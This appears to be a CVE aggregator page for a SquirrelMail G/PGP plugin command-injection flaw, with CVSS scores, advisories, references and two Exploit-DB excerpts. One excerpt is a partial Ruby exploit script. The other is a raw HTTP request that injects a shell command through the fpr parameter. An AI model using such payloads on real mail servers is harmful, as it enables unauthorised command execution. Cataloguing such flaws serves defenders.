CVE-2005-1924
Published: 2005-12-31
Priority: P346, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 10.26% (95.1th percentile)
The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| squirrelmail | gpg_plugin | <= 2.1 | — |
| squirrelmail | gpg_plugin | — | — |
| squirrelmail | squirrelmail | — | — |
CVSS provenance
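| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 9.3 | CRITICAL | — |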
Red Hat
CVE-2007-3635 [CRITICAL]: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
vendor_redhat · CVSS 9.3
Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2.1 for Squirrelmail might allow "local authenticated users" to inject certain commands via unspecified vectors. NOTE: this might overlap CVE-2005-1924, CVE-2006-4169, or CVE-2007-3634.
Statement: Not vulnerable. This plugin is not shipped with Squirrelmail in Red Hat Enterprise Linux.
GHSA
CVE-2005-1924 [HIGH] GHSA-87rp-52qv-ghjc: The G/PGP (GPG) Plugin 2
ghsa_unreviewed · 2022-05-01 · CVSS 7.5
The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.
GHSA
CVE-2007-3635 [CRITICAL] GHSA-qxqw-pch2-xr57: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
ghsa_unreviewed · 2022-05-01 · CVSS 9.3
Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2.1 for Squirrelmail might allow "local authenticated users" to inject certain commands via unspecified vectors. NOTE: this might overlap CVE-2005-1924, CVE-2006-4169, or CVE-2007-3634.
No detection rules found.
Exploit-DB
CVE-2005-1924: SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection
exploitdb · 2007-12-11
---
```ruby
#!/usr/local/bin/ruby
puts "http://backdoored.net\n"
puts "SquirrelMail G/PG deletekey() command injection exploit\n"
puts "http://backdoored.net Visit Us\n"
puts "Coded by Backdoored member. \n"
puts "--------------------------------------------------\n"
if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] == nil && ARGV[3] == nil && ARGV[4] == nil && ARGV[5] == nil
  puts "Usage: ./squ_xploit hostname path port cookie command 0\n"
  puts "if host using ssl use 1 instead of 0\n"
  exit
end
require 'net/http'
require 'net/https'
host = ARGV[0].to_s
port = ARGV[2].to_i
cookie = ARGV[3].to_s
victim = Net::HTTP.new(host,port)
if ARGV[3].to_i == 1
  puts "Entering SSL mode baby\n"
  victim.use_ssl = true
end
command = ARGV[4].to_s
```
Exploit-DB
CVE-2005-1924: SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution
exploitdb · 2007-07-11
---
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
Bugtraq ID: 24782
There are various vulnerabilities in this software! One is in keyring_main.php!
$fpr is not escaped from shell commands!
```
testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#
***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
```
...
No writeups or analysis indexed.
References
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=329
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=331
- http://osvdb.org/37923
- http://osvdb.org/37924
- http://secunia.com/advisories/26035
- http://secunia.com/advisories/26424
- http://security.gentoo.org/glsa/glsa-200708-08.xml
- http://www.attrition.org/pipermail/vim/2007-July/001710.html
- http://www.securityfocus.com/archive/1/473370/100/0/threaded
- http://www.securityfocus.com/bid/24874
- http://www.vupen.com/english/advisories/2007/2513
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35355
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35364
- https://www.exploit-db.com/exploits/4173